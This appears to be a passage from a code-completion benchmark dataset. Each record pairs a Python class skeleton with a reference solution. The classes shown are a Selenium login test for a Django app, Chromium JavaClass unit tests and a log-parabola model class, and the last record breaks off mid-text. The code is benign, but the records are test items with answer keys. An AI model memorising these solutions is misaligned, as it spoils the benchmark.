self.browser.find_element_by_link_text('退出').click()\n self.wait_to_be_logged_out(email=test_email)\n<|end_body_0|>\n\n<|body_start_1|>\n discorrect_url = '{}/accounts/login?token=abc123'.format(self.live_server_url)\n self.browser.get(discorrect_url)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n<|end_body_1|>\n\n<|body_start_2|>\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_1 = self.get_token_url(email_body)\n self.browser.quit()\n time.sleep(5)\n self.init_browser()\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_2 = self.get_token_url(email_body)\n self.assertNotEqual(url_1, url_2)\n self.browser.get(url_1)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n self.browser.get(url_2)\n self.wait_to_be_logged_in(email=test_email)\n<|end_body_2|>\n", "class_docstring": "登录测试", "class_name": "LoginTest", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LoginTest:\n \"\"\"登录测试\"\"\"\n\n def test_001(self):\n \"\"\"输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录\"\"\"\n <|body_0|>\n\n def test_002(self):\n \"\"\"使用错误的链接无法完成登录,并得到登录失败的提示\"\"\"\n <|body_1|>\n\n def test_003(self):\n \"\"\"对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url = self.get_token_url(email_body)\n self.assertIn(self.live_server_url, url)\n self.browser.get(url)\n self.wait_to_be_logged_in(email=test_email)\n self.browser.find_element_by_link_text('退出').click()\n self.wait_to_be_logged_out(email=test_email)\n<|end_body_0|>\n\n<|body_start_1|>\n discorrect_url = '{}/accounts/login?token=abc123'.format(self.live_server_url)\n self.browser.get(discorrect_url)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n<|end_body_1|>\n\n<|body_start_2|>\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_1 = self.get_token_url(email_body)\n self.browser.quit()\n time.sleep(5)\n self.init_browser()\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_2 = self.get_token_url(email_body)\n self.assertNotEqual(url_1, url_2)\n self.browser.get(url_1)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n self.browser.get(url_2)\n self.wait_to_be_logged_in(email=test_email)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000275", "length_bytes": 4463, "license_type": "no_license", "methods": [{"docstring": "输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录", "name": "test_001", "signature": "def test_001(self)"}, {"docstring": "使用错误的链接无法完成登录,并得到登录失败的提示", "name": "test_002", "signature": "def test_002(self)"}, {"docstring": "对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以", "name": "test_003", "signature": "def test_003(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000311", "prompt": "Implement the Python class `LoginTest` described below.\n\nClass description:\n登录测试\n\nMethod signatures and docstrings:\n- def test_001(self): 输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录\n- def test_002(self): 使用错误的链接无法完成登录,并得到登录失败的提示\n- def test_003(self): 对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以", "prompted_full_text": "Implement the Python class `LoginTest` described below.\n\nClass description:\n登录测试\n\nMethod signatures and docstrings:\n- def test_001(self): 输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录\n- def test_002(self): 使用错误的链接无法完成登录,并得到登录失败的提示\n- def test_003(self): 对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以\n\n<|skeleton|>\nclass LoginTest:\n \"\"\"登录测试\"\"\"\n\n def test_001(self):\n \"\"\"输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录\"\"\"\n <|body_0|>\n\n def test_002(self):\n \"\"\"使用错误的链接无法完成登录,并得到登录失败的提示\"\"\"\n <|body_1|>\n\n def test_003(self):\n \"\"\"对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url = self.get_token_url(email_body)\n self.assertIn(self.live_server_url, url)\n self.browser.get(url)\n self.wait_to_be_logged_in(email=test_email)\n self.browser.find_element_by_link_text('退出').click()\n self.wait_to_be_logged_out(email=test_email)\n<|end_body_0|>\n\n<|body_start_1|>\n discorrect_url = '{}/accounts/login?token=abc123'.format(self.live_server_url)\n self.browser.get(discorrect_url)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n<|end_body_1|>\n\n<|body_start_2|>\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_1 = self.get_token_url(email_body)\n self.browser.quit()\n time.sleep(5)\n self.init_browser()\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_2 = self.get_token_url(email_body)\n self.assertNotEqual(url_1, url_2)\n self.browser.get(url_1)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n self.browser.get(url_2)\n self.wait_to_be_logged_in(email=test_email)\n<|end_body_2|>\n", "revision_id": "973b3afb239db5f55cb52897e7a8a241a459349f", "skeleton": "<|skeleton|>\nclass LoginTest:\n \"\"\"登录测试\"\"\"\n\n def test_001(self):\n \"\"\"输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录\"\"\"\n <|body_0|>\n\n def test_002(self):\n \"\"\"使用错误的链接无法完成登录,并得到登录失败的提示\"\"\"\n <|body_1|>\n\n def test_003(self):\n \"\"\"对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LoginTest:\n \"\"\"登录测试\"\"\"\n\n def test_001(self):\n \"\"\"输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录\"\"\"\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url = self.get_token_url(email_body)\n self.assertIn(self.live_server_url, url)\n self.browser.get(url)\n self.wait_to_be_logged_in(email=test_email)\n self.browser.find_element_by_link_text('退出').click()\n self.wait_to_be_logged_out(email=test_email)\n\n def test_002(self):\n \"\"\"使用错误的链接无法完成登录,并得到登录失败的提示\"\"\"\n discorrect_url = '{}/accounts/login?token=abc123'.format(self.live_server_url)\n self.browser.get(discorrect_url)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n\n def test_003(self):\n \"\"\"对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以\"\"\"\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_1 = self.get_token_url(email_body)\n self.browser.quit()\n time.sleep(5)\n self.init_browser()\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_2 = self.get_token_url(email_body)\n self.assertNotEqual(url_1, url_2)\n self.browser.get(url_1)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n self.browser.get(url_2)\n self.wait_to_be_logged_in(email=test_email)\n", "source": "the_stack_v2_python_sparse", "source_path": "functional_tests/test_accounts/test_login.py", "source_repo": "aaluo001/superlists", "split": "test", "star_events_count": 0} {"blob_id": "c532fbbfdde307a35d233e4084d03c5f605ea7d7", "bodies": ["test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\nself.assertEqual(test_node.name, f'{self.TEST_PKG}.{self.TEST_CLS}')\nself.assertEqual(test_node.package, self.TEST_PKG)\nself.assertEqual(test_node.class_name, self.TEST_CLS)", "test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\nequal_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\nself.assertEqual(test_node, equal_node)", "test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\ntest_node.add_nested_class(self.UNIQUE_KEY_1)\nself.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})", "test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\ntest_node.add_nested_class(self.UNIQUE_KEY_1)\ntest_node.add_nested_class(self.UNIQUE_KEY_2)\nself.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1, self.UNIQUE_KEY_2})", "test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\ntest_node.add_nested_class(self.UNIQUE_KEY_1)\ntest_node.add_nested_class(self.UNIQUE_KEY_1)\nself.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})"], "bodies_text": "<|body_start_0|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node.name, f'{self.TEST_PKG}.{self.TEST_CLS}')\n self.assertEqual(test_node.package, self.TEST_PKG)\n self.assertEqual(test_node.class_name, self.TEST_CLS)\n<|end_body_0|>\n\n<|body_start_1|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n equal_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node, equal_node)\n<|end_body_1|>\n\n<|body_start_2|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n<|end_body_2|>\n\n<|body_start_3|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_2)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1, self.UNIQUE_KEY_2})\n<|end_body_3|>\n\n<|body_start_4|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n<|end_body_4|>\n", "class_docstring": "Unit tests for dependency_analysis.class_dependency.JavaClass.", "class_name": "TestJavaClass", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestJavaClass:\n \"\"\"Unit tests for dependency_analysis.class_dependency.JavaClass.\"\"\"\n\n def test_initialization(self):\n \"\"\"Tests that JavaClass is initialized correctly.\"\"\"\n <|body_0|>\n\n def test_equality(self):\n \"\"\"Tests that two JavaClasses with the same package+class are equal.\"\"\"\n <|body_1|>\n\n def test_add_nested_class(self):\n \"\"\"Tests adding a single nested class to this class.\"\"\"\n <|body_2|>\n\n def test_add_nested_class_multiple(self):\n \"\"\"Tests adding multiple nested classes to this class.\"\"\"\n <|body_3|>\n\n def test_add_nested_class_duplicate(self):\n \"\"\"Tests that adding the same nested class twice will not dupe.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node.name, f'{self.TEST_PKG}.{self.TEST_CLS}')\n self.assertEqual(test_node.package, self.TEST_PKG)\n self.assertEqual(test_node.class_name, self.TEST_CLS)\n<|end_body_0|>\n\n<|body_start_1|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n equal_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node, equal_node)\n<|end_body_1|>\n\n<|body_start_2|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n<|end_body_2|>\n\n<|body_start_3|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_2)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1, self.UNIQUE_KEY_2})\n<|end_body_3|>\n\n<|body_start_4|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000276", "length_bytes": 4801, "license_type": "permissive", "methods": [{"docstring": "Tests that JavaClass is initialized correctly.", "name": "test_initialization", "signature": "def test_initialization(self)"}, {"docstring": "Tests that two JavaClasses with the same package+class are equal.", "name": "test_equality", "signature": "def test_equality(self)"}, {"docstring": "Tests adding a single nested class to this class.", "name": "test_add_nested_class", "signature": "def test_add_nested_class(self)"}, {"docstring": "Tests adding multiple nested classes to this class.", "name": "test_add_nested_class_multiple", "signature": "def test_add_nested_class_multiple(self)"}, {"docstring": "Tests that adding the same nested class twice will not dupe.", "name": "test_add_nested_class_duplicate", "signature": "def test_add_nested_class_duplicate(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_001298", "prompt": "Implement the Python class `TestJavaClass` described below.\n\nClass description:\nUnit tests for dependency_analysis.class_dependency.JavaClass.\n\nMethod signatures and docstrings:\n- def test_initialization(self): Tests that JavaClass is initialized correctly.\n- def test_equality(self): Tests that two JavaClasses with the same package+class are equal.\n- def test_add_nested_class(self): Tests adding a single nested class to this class.\n- def test_add_nested_class_multiple(self): Tests adding multiple nested classes to this class.\n- def test_add_nested_class_duplicate(self): Tests that adding the same nested class twice will not dupe.", "prompted_full_text": "Implement the Python class `TestJavaClass` described below.\n\nClass description:\nUnit tests for dependency_analysis.class_dependency.JavaClass.\n\nMethod signatures and docstrings:\n- def test_initialization(self): Tests that JavaClass is initialized correctly.\n- def test_equality(self): Tests that two JavaClasses with the same package+class are equal.\n- def test_add_nested_class(self): Tests adding a single nested class to this class.\n- def test_add_nested_class_multiple(self): Tests adding multiple nested classes to this class.\n- def test_add_nested_class_duplicate(self): Tests that adding the same nested class twice will not dupe.\n\n<|skeleton|>\nclass TestJavaClass:\n \"\"\"Unit tests for dependency_analysis.class_dependency.JavaClass.\"\"\"\n\n def test_initialization(self):\n \"\"\"Tests that JavaClass is initialized correctly.\"\"\"\n <|body_0|>\n\n def test_equality(self):\n \"\"\"Tests that two JavaClasses with the same package+class are equal.\"\"\"\n <|body_1|>\n\n def test_add_nested_class(self):\n \"\"\"Tests adding a single nested class to this class.\"\"\"\n <|body_2|>\n\n def test_add_nested_class_multiple(self):\n \"\"\"Tests adding multiple nested classes to this class.\"\"\"\n <|body_3|>\n\n def test_add_nested_class_duplicate(self):\n \"\"\"Tests that adding the same nested class twice will not dupe.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node.name, f'{self.TEST_PKG}.{self.TEST_CLS}')\n self.assertEqual(test_node.package, self.TEST_PKG)\n self.assertEqual(test_node.class_name, self.TEST_CLS)\n<|end_body_0|>\n\n<|body_start_1|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n equal_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node, equal_node)\n<|end_body_1|>\n\n<|body_start_2|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n<|end_body_2|>\n\n<|body_start_3|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_2)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1, self.UNIQUE_KEY_2})\n<|end_body_3|>\n\n<|body_start_4|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n<|end_body_4|>\n", "revision_id": "a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c", "skeleton": "<|skeleton|>\nclass TestJavaClass:\n \"\"\"Unit tests for dependency_analysis.class_dependency.JavaClass.\"\"\"\n\n def test_initialization(self):\n \"\"\"Tests that JavaClass is initialized correctly.\"\"\"\n <|body_0|>\n\n def test_equality(self):\n \"\"\"Tests that two JavaClasses with the same package+class are equal.\"\"\"\n <|body_1|>\n\n def test_add_nested_class(self):\n \"\"\"Tests adding a single nested class to this class.\"\"\"\n <|body_2|>\n\n def test_add_nested_class_multiple(self):\n \"\"\"Tests adding multiple nested classes to this class.\"\"\"\n <|body_3|>\n\n def test_add_nested_class_duplicate(self):\n \"\"\"Tests that adding the same nested class twice will not dupe.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestJavaClass:\n \"\"\"Unit tests for dependency_analysis.class_dependency.JavaClass.\"\"\"\n\n def test_initialization(self):\n \"\"\"Tests that JavaClass is initialized correctly.\"\"\"\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node.name, f'{self.TEST_PKG}.{self.TEST_CLS}')\n self.assertEqual(test_node.package, self.TEST_PKG)\n self.assertEqual(test_node.class_name, self.TEST_CLS)\n\n def test_equality(self):\n \"\"\"Tests that two JavaClasses with the same package+class are equal.\"\"\"\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n equal_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node, equal_node)\n\n def test_add_nested_class(self):\n \"\"\"Tests adding a single nested class to this class.\"\"\"\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n\n def test_add_nested_class_multiple(self):\n \"\"\"Tests adding multiple nested classes to this class.\"\"\"\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_2)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1, self.UNIQUE_KEY_2})\n\n def test_add_nested_class_duplicate(self):\n \"\"\"Tests that adding the same nested class twice will not dupe.\"\"\"\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n", "source": "the_stack_v2_python_sparse", "source_path": "tools/android/dependency_analysis/class_dependency_unittest.py", "source_repo": "chromium/chromium", "split": "test", "star_events_count": 17408} {"blob_id": "6a8cd2950f6b94c5d9344334fede04012c162db9", "bodies": ["xx = x / x_0\nexponent = -alpha - beta * np.log(xx)\nreturn amplitude * xx ** exponent", "xx = x / x_0\nlog_xx = np.log(xx)\nexponent = -alpha - beta * log_xx\nd_amplitude = xx ** exponent\nd_beta = -amplitude * d_amplitude * log_xx ** 2\nd_x_0 = amplitude * d_amplitude * (beta * log_xx / x_0 - exponent / x_0)\nd_alpha = -amplitude * d_amplitude * log_xx\nreturn [d_amplitude, d_x_0, d_alpha, d_beta]"], "bodies_text": "<|body_start_0|>\n xx = x / x_0\n exponent = -alpha - beta * np.log(xx)\n return amplitude * xx ** exponent\n<|end_body_0|>\n\n<|body_start_1|>\n xx = x / x_0\n log_xx = np.log(xx)\n exponent = -alpha - beta * log_xx\n d_amplitude = xx ** exponent\n d_beta = -amplitude * d_amplitude * log_xx ** 2\n d_x_0 = amplitude * d_amplitude * (beta * log_xx / x_0 - exponent / x_0)\n d_alpha = -amplitude * d_amplitude * log_xx\n return [d_amplitude, d_x_0, d_alpha, d_beta]\n<|end_body_1|>\n", "class_docstring": "One dimensional log parabola model (sometimes called curved power law). Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}", "class_name": "LogParabola1D", "detected_licenses": ["Python-2.0", "Apache-2.0", "BSD-3-Clause", "LicenseRef-scancode-unknown"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LogParabola1D:\n \"\"\"One dimensional log parabola model (sometimes called curved power law). Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}\"\"\"\n\n def evaluate(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola model function\"\"\"\n <|body_0|>\n\n def fit_deriv(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola derivative with respect to parameters\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n xx = x / x_0\n exponent = -alpha - beta * np.log(xx)\n return amplitude * xx ** exponent\n<|end_body_0|>\n\n<|body_start_1|>\n xx = x / x_0\n log_xx = np.log(xx)\n exponent = -alpha - beta * log_xx\n d_amplitude = xx ** exponent\n d_beta = -amplitude * d_amplitude * log_xx ** 2\n d_x_0 = amplitude * d_amplitude * (beta * log_xx / x_0 - exponent / x_0)\n d_alpha = -amplitude * d_amplitude * log_xx\n return [d_amplitude, d_x_0, d_alpha, d_beta]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000277", "length_bytes": 6539, "license_type": "permissive", "methods": [{"docstring": "One dimensional log parabola model function", "name": "evaluate", "signature": "def evaluate(x, amplitude, x_0, alpha, beta)"}, {"docstring": "One dimensional log parabola derivative with respect to parameters", "name": "fit_deriv", "signature": "def fit_deriv(x, amplitude, x_0, alpha, beta)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000086", "prompt": "Implement the Python class `LogParabola1D` described below.\n\nClass description:\nOne dimensional log parabola model (sometimes called curved power law). Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}\n\nMethod signatures and docstrings:\n- def evaluate(x, amplitude, x_0, alpha, beta): One dimensional log parabola model function\n- def fit_deriv(x, amplitude, x_0, alpha, beta): One dimensional log parabola derivative with respect to parameters", "prompted_full_text": "Implement the Python class `LogParabola1D` described below.\n\nClass description:\nOne dimensional log parabola model (sometimes called curved power law). Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}\n\nMethod signatures and docstrings:\n- def evaluate(x, amplitude, x_0, alpha, beta): One dimensional log parabola model function\n- def fit_deriv(x, amplitude, x_0, alpha, beta): One dimensional log parabola derivative with respect to parameters\n\n<|skeleton|>\nclass LogParabola1D:\n \"\"\"One dimensional log parabola model (sometimes called curved power law). Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}\"\"\"\n\n def evaluate(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola model function\"\"\"\n <|body_0|>\n\n def fit_deriv(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola derivative with respect to parameters\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n xx = x / x_0\n exponent = -alpha - beta * np.log(xx)\n return amplitude * xx ** exponent\n<|end_body_0|>\n\n<|body_start_1|>\n xx = x / x_0\n log_xx = np.log(xx)\n exponent = -alpha - beta * log_xx\n d_amplitude = xx ** exponent\n d_beta = -amplitude * d_amplitude * log_xx ** 